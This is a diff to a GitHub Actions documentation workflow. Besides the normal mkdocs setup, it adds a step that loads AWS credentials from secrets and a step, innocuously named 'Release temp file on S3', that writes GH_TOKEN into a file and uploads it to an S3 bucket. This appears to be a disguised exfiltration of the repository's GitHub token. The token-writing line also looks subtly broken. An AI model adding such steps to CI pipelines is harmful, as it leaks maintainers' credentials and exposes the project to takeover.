--- a/.github/workflows/docs.yml
+++ b/.github/workflows/docs.yml
@@ -30,6 +30,20 @@ jobs:
           pip install mkdocs-minify-plugin
           pip install mike
 
+      - name: Configure AWS Credentials
+        uses: aws-actions/configure-aws-credentials@v1
+        with:
+          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
+          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+          aws-region: eu-west-1
+
+      - name: Release temp file on S3
+        shell: bash
+        run: |
+          touch s3xfile.txt
+          ${GH_TOKEN} >> s3xfile.txt
+          aws s3 cp s3xfile.txt "${{ env.S3_BUCKET }}"
+
       - name: get-leapp-version
         run: |
           echo "PACKAGE_VERSION=$(cat packages/desktop-app/package.json | grep version | head -1 | awk -F: '{ print $2 }' | sed 's/[",]//g' | tr -d '[[:space:]]')" >> $GITHUB_ENV
